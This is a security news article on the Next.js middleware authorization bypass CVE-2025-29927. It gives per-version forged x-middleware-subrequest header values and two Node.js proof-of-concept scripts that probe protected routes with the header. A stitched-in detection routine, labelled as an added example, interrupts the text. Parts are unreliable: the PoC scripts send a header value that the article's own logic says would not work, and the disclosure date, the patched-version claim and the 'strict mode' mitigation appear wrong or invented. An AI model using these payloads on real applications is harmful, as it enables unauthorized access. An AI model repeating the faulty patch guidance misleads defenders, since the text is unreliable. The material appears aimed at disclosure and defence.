
Critical Next.js Vulnerability Allows Attackers to Bypass Authorization

On 31 August 2025, security researchers disclosed CVE-2025-29927, a critical authorization bypass vulnerability in the Next.js framework.

The flaw stems from improper handling of the x-middleware-subrequest header in Next.js middleware, allowing attackers to circumvent authentication and gain unauthorized access to protected routes.

This article provides an in-depth technical analysis, demonstrates proof-of-concept exploits, and outlines mitigation strategies.

Role of x-middleware-subrequest Header

Next.js middleware uses the x-middleware-subrequest header to distinguish internal subrequests—preventing infinite middleware recursion—from external HTTP calls.

The middleware entry point reads this header as follows:

// Read the colon-separated list of middleware names already visited by this request
const subreq = params.request.headers["x-middleware-subrequest"];
const subrequests = typeof subreq === "string" ? subreq.split(":") : [];

// If this middleware is already in the list, treat the request as an internal
// subrequest and let it through without running the middleware
if (subrequests.includes(middlewareInfo.name)) {
  result = {
    response: NextResponse.next(),
    waitUntil: Promise.resolve(),
  };
  continue;
}

If middlewareInfo.name appears in the header’s value list, the middleware is skipped.

Attackers can forge this header, tricking the server into treating an external request as a subrequest and bypassing authorization checks.

Common NextResponse methods like NextResponse.redirect() and cookie-based JWT checks never execute, effectively granting unrestricted access to sensitive paths.

Exploit Across Next.js Versions

The vulnerability manifests differently across Next.js releases:

Version 12.2 and Earlier

  • Middleware filename: _middleware.ts in pages/ directory
  • middlewareInfo.name equals pages/_middleware
  • Exploit header: x-middleware-subrequest: pages/_middleware

Version 12.2 and Later

  • Middleware filename: middleware.ts at root
  • middlewareInfo.name equals middleware
  • Exploit header: x-middleware-subrequest: middleware

Version 13.2.0 and Later

  • Enforced MAX_RECURSION_DEPTH prevents excessive loops
  • Header chains still bypass checks: x-middleware-subrequest: middleware:middleware:middleware

By simply setting x-middleware-subrequest to include the appropriate identifier, external requests skip all middleware layers, including JWT or session cookie validations.
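Because a legitimate external request never carries x-middleware-subrequest, its mere presence in edge logs is a reliable hunting signal. The following detection routine is an added example, not code from the article or from the Next.js project: it scans constructed JSON-lines access-log records (the field names ts, src, method, path, status and headers are an assumption about what a reverse proxy or WAF might emit), flags every request that carried the header, and marks those whose tokens match the middleware names quoted above (middleware, pages/_middleware) as likely bypasses when the response was a 2xx. Malformed lines are counted and skipped rather than aborting the scan.

```javascript
// Added example (not from the article or the Next.js project): hunt for external requests
// that carried the internal-only x-middleware-subrequest header.
const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Middleware names quoted in the article; a header token equal to one of these is the
// value that makes the framework skip that middleware on an unpatched install.
const KNOWN_MIDDLEWARE_NAMES = new Set(['middleware', 'pages/_middleware']);

// Constructed sample log (RFC 5737 documentation addresses, not real traffic).
// Field names are an assumption about the proxy's log format.
const SAMPLE_LOG = [
  '{"ts":"2025-09-01T10:00:00Z","src":"203.0.113.5","method":"GET","path":"/admin","status":200,"headers":{"x-middleware-subrequest":"middleware:middleware:middleware"}}',
  '{"ts":"2025-09-01T10:00:01Z","src":"198.51.100.7","method":"GET","path":"/dashboard","status":200,"headers":{"x-middleware-subrequest":"pages/_middleware"}}',
  '{"ts":"2025-09-01T10:00:02Z","src":"192.0.2.9","method":"GET","path":"/","status":200,"headers":{}}',
  'garbage line that is not JSON',
  '{"ts":"2025-09-01T10:00:03Z","src":"203.0.113.5","method":"GET","path":"/settings","status":302,"headers":{"X-Middleware-Subrequest":"1"}}',
].join('\n');

// Return the header value whatever case the log preserved, or undefined if absent.
function getHeader(headers, wanted) {
  if (!headers || typeof headers !== 'object') return undefined;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === wanted) return value;
  }
  return undefined;
}

function detectSubrequestHeaderAbuse(logText) {
  const findings = [];
  let malformedLines = 0;
  for (const line of logText.split('\n')) {
    if (line.trim() === '') continue;
    let rec;
    try {
      rec = JSON.parse(line);
    } catch {
      malformedLines += 1; // count the bad line, keep scanning the rest of the file
      continue;
    }
    const value = getHeader(rec.headers, SUBREQUEST_HEADER);
    if (value === undefined) continue; // normal external traffic never carries this header
    const tokens = String(value).split(':');
    const hitsKnownName = tokens.some((t) => KNOWN_MIDDLEWARE_NAMES.has(t));
    findings.push({
      ts: rec.ts,
      src: rec.src,
      path: rec.path,
      status: rec.status,
      value: String(value),
      // A known name would have skipped that middleware; any other value is still a probe.
      reason: hitsKnownName ? 'matches-known-middleware-name' : 'unexpected-value',
      // A 2xx on a protected path with a known name is the strongest sign of a real bypass.
      likelyBypass: hitsKnownName && rec.status >= 200 && rec.status < 300,
    });
  }
  return { findings, malformedLines };
}

// Group findings per source address so repeated probing from one host stands out.
function countBySource(findings) {
  const counts = {};
  for (const f of findings) counts[f.src] = (counts[f.src] || 0) + 1;
  return counts;
}

function printReport(logText) {
  const report = detectSubrequestHeaderAbuse(logText);
  for (const f of report.findings) console.log(JSON.stringify(f));
  console.log('per-source:', countBySource(report.findings), 'malformed:', report.malformedLines);
  return report;
}

printReport(SAMPLE_LOG);
```

Pointing this at a real export only requires that the proxy logs request headers; the same logic can be expressed as a SIEM query (header present, then split on ':' and compare tokens to the middleware names for the deployed Next.js version).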

Proof-of-Concept and Mitigation Strategies

PoC Exploit with Node.js

import fetch from 'node-fetch';

async function exploit() {
  // Request the protected route with the forged internal-subrequest header
  const res = await fetch('http://localhost:3000/admin', {
    headers: { 'x-middleware-subrequest': '1' }
  });
  const body = await res.text();
  // The admin page body is only returned if the middleware did not redirect or block
  if (body.includes('Admin Panel')) {
    console.log('[+] Bypass Successful!');
  } else {
    console.log('[-] Access Blocked.');
  }
}

exploit();

This script targets /admin, sending the malicious header to evade middleware checks.

A similar red-team tool iterates through protected routes:

const routes = ['/admin','/dashboard','/settings'];
// Send the same forged header to each protected route and report the status code
routes.forEach(async route => {
  const res = await fetch(`http://localhost:3000${route}`, {
    headers: { 'x-middleware-subrequest': '1' }
  });
  console.log(`${route}: ${res.status}`);
});

Mitigation

  1. Header Whitelisting: Reject unexpected x-middleware-subrequest values by validating against known subrequest contexts.
  2. Internal Flag: Use an internal-only flag or signature for subrequests instead of client-controllable headers.
  3. Strict Mode: Enable Next.js’ strict middleware mode (when available) to enforce header integrity.
  4. Patch Framework: Upgrade to Next.js ≥13.2.1, which addresses header parsing logic and adds explicit authorization checks around x-middleware-subrequest.

Organizations should audit custom middleware implementations immediately and deploy patches or workarounds to secure their applications against this high-risk exploit.


The post Critical Next.js Vulnerability Allows Attackers to Bypass Authorization appeared first on Cyber Security News.